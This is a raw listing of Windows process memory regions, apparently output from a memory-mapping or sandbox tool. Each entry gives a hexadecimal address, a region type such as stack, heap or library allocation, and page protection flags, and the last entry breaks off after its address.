B1C7EE3000
stack
page read and write
D6A523B000
stack
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
13D104C1000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
215380C9000
heap
page read and write
24098D98000
heap
page read and write
1ACBFDBF000
heap
page read and write
240B2F71000
heap
page read and write
7FFD9BA9A000
trusted library allocation
page read and write
7FFD9BCB3000
trusted library allocation
page read and write
1DF2EEA8000
heap
page read and write
24098AE0000
heap
page read and write
7FFD9B8D3000
trusted library allocation
page execute and read and write
8649DFE000
stack
page read and write
1ACBFDBF000
heap
page read and write
2409A5E5000
heap
page read and write
13D01EFA000
trusted library allocation
page read and write
13D7E5A5000
heap
page read and write
217EC776000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
2C7C40D000
stack
page read and write
215214A0000
trusted library allocation
page read and write
21781631000
trusted library allocation
page read and write
13D00060000
trusted library allocation
page read and write
2152F971000
trusted library allocation
page read and write
2152135B000
trusted library allocation
page read and write
1DF1752C000
trusted library allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
13D187F4000
heap
page read and write
1EBD2FA9000
heap
page read and write
1DF16E40000
heap
page read and write
21521019000
trusted library allocation
page read and write
240B2E2F000
heap
page read and write
7FFD9BC29000
trusted library allocation
page read and write
1EBD2DE0000
heap
page execute and read and write
7FFD9BD60000
trusted library allocation
page read and write
1EBD2F5D000
heap
page read and write
1DF14E2D000
heap
page read and write
21538032000
heap
page read and write
1EBBA6A5000
heap
page read and write
13D01B82000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
7FFD9BC34000
trusted library allocation
page read and write
1EBBA7B0000
heap
page execute and read and write
217819D5000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page execute and read and write
1EBBBD3C000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
13D7FEB5000
heap
page read and write
7FFD9BADC000
trusted library allocation
page read and write
864A33B000
stack
page read and write
21521354000
trusted library allocation
page read and write
1EBD2E08000
heap
page read and write
7FFD9BD60000
trusted library allocation
page read and write
2409B725000
trusted library allocation
page read and write
1ACC4652000
heap
page read and write
1EBBC01F000
trusted library allocation
page read and write
1DF16E51000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
13D012BA000
trusted library allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
D6A4DFD000
stack
page read and write
1DF16ED5000
trusted library allocation
page read and write
7FFD9BAB4000
trusted library allocation
page read and write
1DF14E6E000
heap
page read and write
7FFD9B8E2000
trusted library allocation
page read and write
1EBD34C9000
heap
page read and write
13D00317000
heap
page read and write
1DF14E0E000
heap
page read and write
1DF176D4000
trusted library allocation
page read and write
13D00312000
heap
page read and write
1DF14DE0000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
13D18CA0000
heap
page read and write
7DF491820000
trusted library allocation
page execute and read and write
7FFD9BC14000
trusted library allocation
page read and write
D6A51BE000
stack
page read and write
1EBD34D6000
heap
page read and write
217EA800000
heap
page read and write
217EC994000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
240AA935000
trusted library allocation
page read and write
240B2DE0000
heap
page execute and read and write
7FFD9BBE0000
trusted library allocation
page read and write
215380D7000
heap
page read and write
7FFD9B91B000
trusted library allocation
page read and write
7FFD9B94C000
trusted library allocation
page execute and read and write
7FFD9BCE0000
trusted library allocation
page read and write
1ACBFD79000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1EBBC0D3000
trusted library allocation
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
8814CCE000
stack
page read and write
2409B9C1000
trusted library allocation
page read and write
2152F9E5000
trusted library allocation
page read and write
88142FB000
stack
page read and write
217EA940000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
13D00000000
trusted library section
page read and write
7FFD9BB90000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
14F75F45000
heap
page read and write
13D01B25000
trusted library allocation
page read and write
13D002DA000
heap
page read and write
1ACC46D4000
heap
page read and write
2152FA1F000
trusted library allocation
page read and write
8814079000
stack
page read and write
1DF16F74000
trusted library allocation
page read and write
217EC81E000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
13D187F0000
heap
page read and write
240B3566000
heap
page read and write
1ACBFD3F000
heap
page read and write
1DF14D60000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
240B3364000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
864A03E000
stack
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
13D002D5000
heap
page read and write
7FFD9B8C3000
trusted library allocation
page execute and read and write
217EC860000
heap
page execute and read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9B8FD000
trusted library allocation
page execute and read and write
13D7E5BD000
heap
page read and write
21521463000
trusted library allocation
page read and write
7FFD9BA82000
trusted library allocation
page read and write
2409B7FA000
trusted library allocation
page read and write
FAA474E000
stack
page read and write
7DF412220000
trusted library allocation
page execute and read and write
1EBBBEAE000
trusted library allocation
page read and write
7FFD9B976000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
240B2E15000
heap
page read and write
1EBD2DFC000
heap
page read and write
7FFD9B92C000
trusted library allocation
page execute and read and write
240B3401000
heap
page read and write
24098D20000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
1ACBFD15000
heap
page read and write
13D003F7000
heap
page execute and read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
2409B3B3000
trusted library allocation
page read and write
D6A503A000
stack
page read and write
217EC80E000
heap
page read and write
21520B53000
trusted library allocation
page read and write
2151F870000
heap
page execute and read and write
13D00441000
trusted library allocation
page read and write
B1C873E000
stack
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
7FFD9B8F4000
trusted library allocation
page read and write
14F75F42000
heap
page read and write
21538022000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
D6A5D8A000
stack
page read and write
13D104DA000
trusted library allocation
page read and write
2151F876000
heap
page execute and read and write
1EBB8D40000
trusted library allocation
page read and write
7FFD9BAB7000
trusted library allocation
page read and write
2C7B27E000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
2C7C48E000
stack
page read and write
2151DE50000
trusted library section
page read and write
2409A5F5000
heap
page read and write
2151F960000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
21520393000
trusted library allocation
page read and write
13D01AF1000
trusted library allocation
page read and write
7FFD9BC28000
trusted library allocation
page read and write
7FFD9BBD6000
trusted library allocation
page read and write
1ACBFDC1000
heap
page read and write
2409A5F0000
heap
page read and write
1EBBA979000
trusted library allocation
page read and write
1DF16848000
heap
page read and write
1ACBFD1B000
heap
page read and write
1EBD2DE6000
heap
page execute and read and write
FAA37FF000
stack
page read and write
21520624000
trusted library allocation
page read and write
7DF412200000
trusted library allocation
page execute and read and write
1EBBC263000
trusted library allocation
page read and write
1ACBFD3A000
heap
page read and write
1EBBC195000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1ACBFDBE000
heap
page read and write
7DF40DBB0000
trusted library allocation
page execute and read and write
2151F7B0000
heap
page read and write
240B2CDA000
heap
page read and write
13D01E33000
trusted library allocation
page read and write
1EBBBF61000
trusted library allocation
page read and write
240B2CC9000
heap
page read and write
1ACBFC40000
heap
page read and write
7FFD9BB60000
trusted library allocation
page read and write
2178008A000
trusted library allocation
page read and write
1ACBFDBF000
heap
page read and write
240B2C50000
heap
page read and write
240B2EDB000
heap
page read and write
7FF65A350000
unkown
page readonly
14F75E84000
heap
page read and write
1EBBC2E1000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
217EA5C0000
heap
page read and write
217EC76E000
heap
page read and write
2409B8F8000
trusted library allocation
page read and write
2409A616000
heap
page read and write
7FFD9B996000
trusted library allocation
page read and write
21520C0F000
trusted library allocation
page read and write
2C7C38E000
stack
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
217EC130000
heap
page readonly
7FFD9B9A6000
trusted library allocation
page execute and read and write
24098C46000
heap
page read and write
7FF65A351000
unkown
page execute read
7FFD9B8E3000
trusted library allocation
page execute and read and write
7FFD9B9B0000
trusted library allocation
page execute and read and write
1ACC4714000
heap
page read and write
2178053E000
trusted library allocation
page read and write
215210AA000
trusted library allocation
page read and write
13D105EF000
trusted library allocation
page read and write
21521036000
trusted library allocation
page read and write
13D7E5A0000
heap
page read and write
2151DC10000
heap
page read and write
2151FB2A000
trusted library allocation
page read and write
1EBBB884000
trusted library allocation
page read and write
1EBB8CF0000
trusted library allocation
page read and write
FAA3B7E000
stack
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
7FFD9B8F3000
trusted library allocation
page execute and read and write
1EBBB8D9000
trusted library allocation
page read and write
1EBD2DF0000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
240B2F1A000
heap
page read and write
1DF16E67000
trusted library allocation
page read and write
1EBBBF6D000
trusted library allocation
page read and write
1ACC33E3000
heap
page read and write
1ACC4715000
heap
page read and write
B1C8639000
stack
page read and write
7FFD9BAA7000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
1EBCA85A000
trusted library allocation
page read and write
1ACBFD6E000
heap
page read and write
7FFD9BAA1000
trusted library allocation
page read and write
B1C837E000
stack
page read and write
21521422000
trusted library allocation
page read and write
1EBB8D90000
heap
page read and write
7FFD9BC50000
trusted library allocation
page read and write
7FF65A3BF000
unkown
page readonly
1ACBFD29000
heap
page read and write
13D189A2000
heap
page read and write
1EBD2FE2000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1DF2EFE7000
heap
page read and write
1EBB8BB0000
trusted library section
page read and write
217EA753000
heap
page read and write
14F75BE0000
heap
page read and write
24098C19000
heap
page read and write
7FFD9B91D000
trusted library allocation
page execute and read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
7FFD9B9D6000
trusted library allocation
page execute and read and write
7FFD9BC40000
trusted library allocation
page read and write
7FFD9BD30000
trusted library allocation
page read and write
2151F695000
heap
page read and write
1DF171FB000
trusted library allocation
page read and write
2152F980000
trusted library allocation
page read and write
13D7FEFA000
heap
page read and write
1EBD30B0000
heap
page read and write
7FFD9BAAA000
trusted library allocation
page read and write
FAA39F7000
stack
page read and write
13D01711000
trusted library allocation
page read and write
7FFD9BC20000
trusted library allocation
page read and write
1EBD2F74000
heap
page read and write
13D005FA000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1ACC45D3000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page execute and read and write
7FFD9B902000
trusted library allocation
page read and write
864A1BE000
stack
page read and write
1ACC4551000
heap
page read and write
240B2F0C000
heap
page read and write
14F75C96000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
240AABBD000
trusted library allocation
page read and write
13D18D0B000
heap
page read and write
7FFD9BD70000
trusted library allocation
page read and write
1EBBBEEC000
trusted library allocation
page read and write
7FFD9BC20000
trusted library allocation
page read and write
7FFD9BC32000
trusted library allocation
page read and write
1DF2EE92000
heap
page read and write
21537F30000
heap
page read and write
2151DEA0000
trusted library allocation
page read and write
217902FF000
trusted library allocation
page read and write
1EBB8C7F000
heap
page read and write
1EBBA5A6000
heap
page read and write
D6A4D7A000
stack
page read and write
7FFD9BB40000
trusted library allocation
page read and write
240B31E0000
heap
page read and write
7FF65A351000
unkown
page execute read
7FF65A398000
unkown
page readonly
1DF26EDF000
trusted library allocation
page read and write
881437E000
stack
page read and write
1EBBC19C000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page execute and read and write
8649FB8000
stack
page read and write
21538060000
heap
page read and write
240B3470000
heap
page read and write
7FFD9BD40000
trusted library allocation
page read and write
13D189CA000
heap
page read and write
1EBD326F000
heap
page read and write
1EBBB5AC000
trusted library allocation
page read and write
1EBB8B90000
heap
page read and write
1ACBFFF0000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page execute and read and write
B1C82FD000
stack
page read and write
217EA70C000
heap
page read and write
1ACBFD25000
heap
page read and write
1EBD32C0000
heap
page read and write
8813D79000
stack
page read and write
2409B844000
trusted library allocation
page read and write
217EC2E5000
heap
page read and write
7FFD9BC24000
trusted library allocation
page read and write
D6A5C8C000
stack
page read and write
215211DE000
trusted library allocation
page read and write
7FFD9BAAA000
trusted library allocation
page read and write
7FFD9BAA4000
trusted library allocation
page read and write
13D014ED000
trusted library allocation
page read and write
240AABB3000
trusted library allocation
page read and write
1DF14C60000
heap
page read and write
7FFD9BAB1000
trusted library allocation
page read and write
2152FA10000
trusted library allocation
page read and write
2C7B5F7000
stack
page read and write
2409BAC9000
trusted library allocation
page read and write
1EBCA937000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
1ACC45D4000
heap
page read and write
217EC740000
heap
page read and write
2151F690000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
21520FD0000
trusted library allocation
page read and write
1ACBFD2F000
heap
page read and write
1ACC4651000
heap
page read and write
240AA8E1000
trusted library allocation
page read and write
1EBBBE45000
trusted library allocation
page read and write
1EBB8C7D000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1EBD2FA1000
heap
page read and write
13D00366000
heap
page read and write
7FFD9B8ED000
trusted library allocation
page execute and read and write
1DF14FA5000
heap
page read and write
1DF14F20000
trusted library allocation
page read and write
217803E5000
trusted library allocation
page read and write
1DF14E73000
heap
page read and write
1EBD2F34000
heap
page read and write
1EBBB8E6000
trusted library allocation
page read and write
B1C853E000
stack
page read and write
1EBB8B30000
heap
page read and write
7FFD9BD30000
trusted library allocation
page read and write
1DF17CB2000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
217EC140000
trusted library allocation
page read and write
14F75C70000
heap
page read and write
D6A4C7A000
stack
page read and write
7FFD9B8C0000
trusted library allocation
page read and write
1EBD2DF8000
heap
page read and write
7FFD9B9C6000
trusted library allocation
page execute and read and write
88141FE000
stack
page read and write
21538042000
heap
page read and write
1EBBB80D000
trusted library allocation
page read and write
FAA3C7C000
stack
page read and write
8813EFD000
stack
page read and write
2151DE80000
trusted library allocation
page read and write
240B2ED4000
heap
page read and write
1DF16F71000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
7FFD9BAA1000
trusted library allocation
page read and write
7FFD9B91B000
trusted library allocation
page execute and read and write
1DF2EEDC000
heap
page read and write
21538460000
heap
page read and write
1ACBFD3A000
heap
page read and write
7DF490F00000
trusted library allocation
page execute and read and write
2151DEE8000
heap
page read and write
2151DCC7000
heap
page read and write
7FF65A3BE000
unkown
page write copy
13D18D0F000
heap
page read and write
1ACBFFEA000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page execute and read and write
7FFD9BB50000
trusted library allocation
page read and write
40BB730000
stack
page read and write
21780542000
trusted library allocation
page read and write
40BB735000
stack
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1DF16820000
heap
page execute and read and write
88140F9000
stack
page read and write
1ACBFFF5000
heap
page read and write
7FFD9BAA2000
trusted library allocation
page read and write
8813CFF000
stack
page read and write
7FFD9B8DD000
trusted library allocation
page execute and read and write
1EBD2E32000
heap
page read and write
13D18CB9000
heap
page read and write
1DF14D40000
heap
page read and write
215213E8000
trusted library allocation
page read and write
13D01B97000
trusted library allocation
page read and write
13D00E62000
trusted library allocation
page read and write
13D7E835000
heap
page read and write
7FFD9B8EB000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
13D189AF000
heap
page read and write
1EBCA82E000
trusted library allocation
page read and write
1EBD32D0000
heap
page read and write
2C7BA3E000
stack
page read and write
13D1880C000
heap
page read and write
13D01CB6000
trusted library allocation
page read and write
7FFD9BCEC000
trusted library allocation
page read and write
1DF2F023000
heap
page read and write
1ACC4611000
heap
page read and write
7FFD9BA8A000
trusted library allocation
page read and write
7FFD9B8FD000
trusted library allocation
page execute and read and write
2409B785000
trusted library allocation
page read and write
13D003F0000
heap
page execute and read and write
1EBB8D10000
trusted library allocation
page read and write
7FFD9BADE000
trusted library allocation
page read and write
2C7B57D000
stack
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
FAA47CE000
stack
page read and write
881417F000
stack
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
1ACBFD31000
heap
page read and write
1EBBBA55000
trusted library allocation
page read and write
7FFD9BD60000
trusted library allocation
page read and write
1ACBFFFE000
heap
page read and write
2152108C000
trusted library allocation
page read and write
21780F42000
trusted library allocation
page read and write
1EBBA7C1000
trusted library allocation
page read and write
7FFD9BA62000
trusted library allocation
page read and write
13D10441000
trusted library allocation
page read and write
7FFD9BCCC000
trusted library allocation
page read and write
D6A4A72000
stack
page read and write
7DF491830000
trusted library allocation
page execute and read and write
1EBD2CB1000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
2153803F000
heap
page read and write
B1C86B9000
stack
page read and write
1DF173DB000
trusted library allocation
page read and write
1EBD2FCD000
heap
page read and write
217EC779000
heap
page read and write
2152111F000
trusted library allocation
page read and write
24098CF0000
heap
page read and write
24098C42000
heap
page read and write
1ACBFDBF000
heap
page read and write
7FFD9BD30000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
7FFD9BC4C000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
FAA3CFE000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9BD20000
trusted library allocation
page read and write
1EBD3475000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
8813902000
stack
page read and write
1ACBFD1C000
heap
page read and write
1EBBA832000
trusted library allocation
page read and write
217EC9EB000
heap
page read and write
7FFD9BC5C000
trusted library allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
1ACC45D4000
heap
page read and write
2409C3AA000
trusted library allocation
page read and write
240B2F6D000
heap
page read and write
2C7B63E000
stack
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1EBD2E0C000
heap
page read and write
1EBCA7D0000
trusted library allocation
page read and write
2151DBE0000
heap
page read and write
2151F971000
trusted library allocation
page read and write
13D01D56000
trusted library allocation
page read and write
7FFD9B8FB000
trusted library allocation
page read and write
1DF14DEC000
heap
page read and write
217EC170000
heap
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
1DF2EE89000
heap
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
1EBB8C3F000
heap
page read and write
40BC0FF000
stack
page read and write
1EBB8C37000
heap
page read and write
13D1884D000
heap
page read and write
2152148E000
trusted library allocation
page read and write
217802E5000
trusted library allocation
page read and write
1DF2EE55000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
2409B3A1000
trusted library allocation
page read and write
1ACBFD6D000
heap
page read and write
1EBBB9D0000
trusted library allocation
page read and write
D6A50BE000
stack
page read and write
21520A13000
trusted library allocation
page read and write
7FF65A398000
unkown
page readonly
7FFD9BAD0000
trusted library allocation
page execute and read and write
8813E7B000
stack
page read and write
7FFD9BB60000
trusted library allocation
page read and write
215380E6000
heap
page read and write
1EBCA841000
trusted library allocation
page read and write
13D7E838000
heap
page read and write
7FFD9BDA0000
trusted library allocation
page read and write
13D7FEE8000
heap
page read and write
7FFD9B9AC000
trusted library allocation
page execute and read and write
1ACBFCE8000
heap
page read and write
7FFD9BD03000
trusted library allocation
page read and write
1EBBBFD5000
trusted library allocation
page read and write
13D00050000
heap
page readonly
FAA3978000
stack
page read and write
7FFD9BB10000
trusted library allocation
page read and write
1ACBFCE0000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
8649E7E000
stack
page read and write
7FFD9B9D6000
trusted library allocation
page execute and read and write
7FFD9BC10000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
21520DEF000
trusted library allocation
page read and write
7FFD9B9B6000
trusted library allocation
page read and write
1DF16EAE000
trusted library allocation
page read and write
2C7AFD3000
stack
page read and write
7FFD9BC60000
trusted library allocation
page read and write
21780001000
trusted library allocation
page read and write
13D18832000
heap
page read and write
D6A5D0A000
stack
page read and write
7DF412210000
trusted library allocation
page execute and read and write
13D7E606000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1ACC3D03000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
21537DC6000
heap
page read and write
1DF2EE81000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9BD50000
trusted library allocation
page read and write
1ACC1C30000
trusted library allocation
page read and write
1EBD2FBB000
heap
page read and write
1EBB8B50000
heap
page read and write
14F75F45000
heap
page read and write
217EA749000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
13D01F66000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
2409BA77000
trusted library allocation
page read and write
215210EE000
trusted library allocation
page read and write
1EBBBECE000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
8649CFD000
stack
page read and write
13D01587000
trusted library allocation
page read and write
7FFD9BC13000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
14F75C8A000
heap
page read and write
1EBD2FEE000
heap
page read and write
240B33D2000
heap
page read and write
7FFD9BD62000
trusted library allocation
page read and write
1EBBBDD9000
trusted library allocation
page read and write
13D01C9F000
trusted library allocation
page read and write
13D7FEE6000
heap
page read and write
215207E0000
trusted library allocation
page read and write
7FFD9BAD2000
trusted library allocation
page read and write
13D01A70000
trusted library allocation
page read and write
21790001000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
40BBBFE000
stack
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1EBB8DD8000
heap
page read and write
7FFD9B8E4000
trusted library allocation
page read and write
1EBBC229000
trusted library allocation
page read and write
7FF65A3BE000
unkown
page readonly
1ACBFD3A000
heap
page read and write
8649C7E000
stack
page read and write
7FFD9BB30000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
2409C3EF000
trusted library allocation
page read and write
1EBBBC31000
trusted library allocation
page read and write
1DF2EEBB000
heap
page read and write
217EC951000
heap
page read and write
2C7B7B9000
stack
page read and write
24098D60000
trusted library allocation
page read and write
2409B8DD000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
1EBB8BF0000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
1EBD2FDA000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1DF14DE5000
heap
page read and write
240AABAF000
trusted library allocation
page read and write
7FFD9BC7C000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
7FFD9BD50000
trusted library allocation
page read and write
21780478000
trusted library allocation
page read and write
13D00010000
trusted library section
page read and write
2409A5B0000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
2409BA4E000
trusted library allocation
page read and write
1EBD2E4A000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
1ACC4610000
heap
page read and write
7FF65A3BA000
unkown
page readonly
240B2F61000
heap
page read and write
2151DEE0000
heap
page read and write
217EC1B0000
trusted library allocation
page read and write
1EBBC009000
trusted library allocation
page read and write
21521194000
trusted library allocation
page read and write
2151DC80000
heap
page read and write
7FFD9B8FD000
trusted library allocation
page execute and read and write
7FFD9BC39000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1DF16F77000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9B903000
trusted library allocation
page execute and read and write
7FFD9BC20000
trusted library allocation
page read and write
1EBBA6A8000
heap
page read and write
1ACBFDBF000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
2409A8A0000
trusted library allocation
page read and write
7FFD9B8C2000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
1EBCA849000
trusted library allocation
page read and write
217EA74B000
heap
page read and write
1ACBFD51000
heap
page read and write
217901C8000
trusted library allocation
page read and write
7FFD9B8D4000
trusted library allocation
page read and write
2409A720000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
1EBBA6A0000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
1DF16876000
heap
page read and write
7FFD9B8F4000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
1EBBC2CF000
trusted library allocation
page read and write
240B2C8D000
heap
page read and write
7FFD9B8F4000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
240B2E7F000
heap
page read and write
240B2E77000
heap
page read and write
2151F850000
heap
page execute and read and write
7FFD9B8D2000
trusted library allocation
page read and write
13D01BF7000
trusted library allocation
page read and write
1EBD34E9000
heap
page read and write
7FFD9BD70000
trusted library allocation
page read and write
40BC1FC000
stack
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
2409A870000
heap
page execute and read and write
1EBCA83F000
trusted library allocation
page read and write
2152F9F5000
trusted library allocation
page read and write
7FF65A3BA000
unkown
page readonly
2409C31E000
trusted library allocation
page read and write
1DF2EF18000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
1EBD2CEA000
heap
page read and write
7FFD9B8F3000
trusted library allocation
page execute and read and write
7FFD9B9E6000
trusted library allocation
page execute and read and write
7FFD9BB00000
trusted library allocation
page read and write
1ACC4714000
heap
page read and write
240B34BC000
heap
page read and write
14F75E40000
heap
page read and write
13D01F3B000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
21781B99000
trusted library allocation
page read and write
1EBD2CEE000
heap
page read and write
7FFD9B90D000
trusted library allocation
page execute and read and write
1DF16840000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
240B2F65000
heap
page read and write
1EBD2E04000
heap
page read and write
D6A5C0E000
stack
page read and write
13D7FEB8000
heap
page read and write
7DF40DBC0000
trusted library allocation
page execute and read and write
1ACBFFD1000
trusted library allocation
page read and write
217EC920000
heap
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
21538493000
heap
page read and write
7FFD9BA92000
trusted library allocation
page read and write
240AABCD000
trusted library allocation
page read and write
B1C827F000
stack
page read and write
240B2F51000
heap
page read and write
13D00346000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9B91B000
trusted library allocation
page execute and read and write
1DF16EDC000
trusted library allocation
page read and write
13D01A88000
trusted library allocation
page read and write
1EBD35D3000
heap
page read and write
2152F9FF000
trusted library allocation
page read and write
13D187FC000
heap
page read and write
864A13E000
stack
page read and write
FAA367E000
stack
page read and write
2C7B93E000
stack
page read and write
7FFD9BD20000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
B1C883E000
stack
page read and write
13D01E4D000
trusted library allocation
page read and write
1ACBFD3F000
heap
page read and write
864AD0E000
stack
page read and write
7FFD9B94C000
trusted library allocation
page execute and read and write
1ACC4714000
heap
page read and write
13D016EB000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
13D01AA8000
trusted library allocation
page read and write
7FFD9BAE4000
trusted library allocation
page read and write
1DF2F01E000
heap
page read and write
2151F7B5000
heap
page read and write
13D7E550000
heap
page read and write
2151F920000
heap
page execute and read and write
8649D7E000
stack
page read and write
7FFD9B8DB000
trusted library allocation
page read and write
13D7FEB0000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
13D188D5000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
13D104BF000
trusted library allocation
page read and write
1EBB8DD5000
heap
page read and write
7FFD9BB73000
trusted library allocation
page read and write
1EBD3298000
heap
page read and write
881427E000
stack
page read and write
1ACBFC30000
heap
page readonly
86499CF000
stack
page read and write
FAA48CA000
stack
page read and write
13D002DC000
heap
page read and write
881398D000
stack
page read and write
7FFD9BC60000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1EBD2CF7000
heap
page read and write
7FFD9BAC2000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1EBBBE28000
trusted library allocation
page read and write
7FFD9BD00000
trusted library allocation
page read and write
215380F2000
heap
page read and write
1EBD3327000
heap
page read and write
13D00090000
trusted library allocation
page read and write
7FFD9B90D000
trusted library allocation
page execute and read and write
13D7FEC5000
heap
page read and write
40BBEFD000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
240B3396000
heap
page read and write
1DF2EE53000
heap
page read and write
21537F5A000
heap
page read and write
240B2DE7000
heap
page execute and read and write
13D7E470000
heap
page read and write
7FFD9BAC4000
trusted library allocation
page read and write
2409C2BF000
trusted library allocation
page read and write
1EBD2C59000
heap
page read and write
21520FE7000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
1DF17CB6000
trusted library allocation
page read and write
2C7B2FE000
stack
page read and write
7FFD9B90B000
trusted library allocation
page read and write
1EBBA580000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
864994F000
unkown
page read and write
1DF2EFFB000
heap
page read and write
217EA700000
heap
page read and write
1DF2EF3C000
heap
page read and write
1EBB8D00000
heap
page readonly
D6A4B7E000
stack
page read and write
21537FD4000
heap
page read and write
FAA3BFE000
stack
page read and write
13D18A90000
heap
page read and write
2151DE90000
heap
page readonly
7FFD9BAC0000
trusted library allocation
page execute and read and write
7FFD9BC60000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
13D105B7000
